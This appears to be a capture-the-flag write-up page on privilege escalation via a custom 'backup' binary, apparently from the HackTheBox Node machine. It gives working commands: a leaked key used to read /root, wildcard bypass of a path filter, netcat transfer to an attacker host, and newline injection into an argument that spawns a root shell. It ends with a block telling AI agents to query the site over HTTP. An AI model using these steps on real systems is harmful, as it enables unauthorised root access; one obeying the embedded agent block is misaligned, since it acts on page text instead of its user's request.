# binaries ## You found a custom Binary * What does it do? * Perhaps a script or job is running it. * How many options does it take? * How you can exploit it? * REF: [BufferOverflow](/06-linux-privesc/buffer-overflow.md), [CharEvasion](/03-getting-in/char-evasion-tricks.md), [PrivEsc](/06-linux-privesc/lx-privesc.md) ## "backup" example * From nodeHTB, [mongodb](/06-linux-privesc/mongodb-node.md) * Custom app: **/usr/local/bin/backup** * Find a script that executes 'backup' and learn from it! ``` grep -Ri backup . ..find references to 'backup' find . | grep app.js ..find our app cat /var/www/myplace/app.js const backup_key = '45fac123...'; app.get('/api/admin/backup', function (req, res) { if (req.session.user && req.session.user.is_admin) { var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]); var backup = ''; backup -q key /dir ..we learned how to execute! ``` ## backup /root ``` ---------------- backup -q key /dir ..how to execute! /usr/local/bin/backup -q 45fac123... /tmp > out.txt ..works! base64 -d out.txt > decode-base64 ..decode file decode-base64 ..zip archive unzip decode-base64 ..unzip ---------------- get root: /usr/local/bin/backup -q 45fac123... /root > root.txt base64 -d root.txt > /tmp/root unzip root ..failed 7z x rootdecoded ..kinda worked? cat root ..failed ``` ## Avoid '/root' Filter with Splatting * REF: [CharEvasion](/03-getting-in/char-evasion-tricks.md) ``` ---------------- Root Blocked echo 'hello' > /tmp/root ..decode/unzip/cat ..fail echo 'hello' > /tmp/*r00t ..decode/unzip/cat ..success ---------------- Splatting: .backup -q secretkey /r**t/r**t.txt > root.txt base64 -d root.txt > /tmp/secret unzip secret cat root/root.txt ..success ---------------- myapp -q secretkey /r**t/r**t.txt > /tmp/encoded myapp -q secretkey /r??t/roo?.txt > /tmp/encoded myapp -q secretkey /r*t/r*t.txt > /tmp/encoded ``` ## Work Local * Send file to yourself.. You have better analysis tools! ``` nc $MyIP 4444 < /usr/bin/backup ..send nc -nlvp 4444 > backup ..receive md5sum backup ..confirm chmod +x ./backup ``` ## strace ``` strace ./backup ..might be interesting strace ./backup 1 2 3 ..works better with 3 arguments :) ltrace ..found our app was filtering root and etc ltrace /usr/local/bin/backup -q secretkey /root/root.txt ``` ## Analyze Assembly: radare2 ``` > r2 backup aaa ..analyze afl ..function list vvv ..visual mode sym.main ..scroll here g g ..get details ..change view: nice call graph ./backup 1 2 3 ..App needs 3 Arguments! strace ./backup 1 2 3 ..reads from /etc/myplace/keys ``` ## Analyze Assembly: binaryninja * Better graphics than radare2 * But, doesnt show hex nicely ``` /opt/binaryninja/binaryninja 'main' ..drill around follow the blacklist and trollface 'push' ..keywords to watch for Found redirects: /root $ ` ; | /etc // / ``` ## PrivEsc: Newline Character * ``` /bin/myapp -q secretkey "xxx > /bin/bash > xxx" # whoami ..root! ``` ## PrivEsc: Newline Character printf * Newline character in printf function can also give you root! ``` ------------------ printf 'hi\nNewLine\nBye' ..gives us new lines ------------------ /bin/myapp -q secretkey "$(printf 'xxx\n/bin/bash\nxxx')" /bin/myapp -q secretkey "$(printf 'xxx\n/bin/sh\nxxx')" ``` ## --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/06-linux-privesc/binaries.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.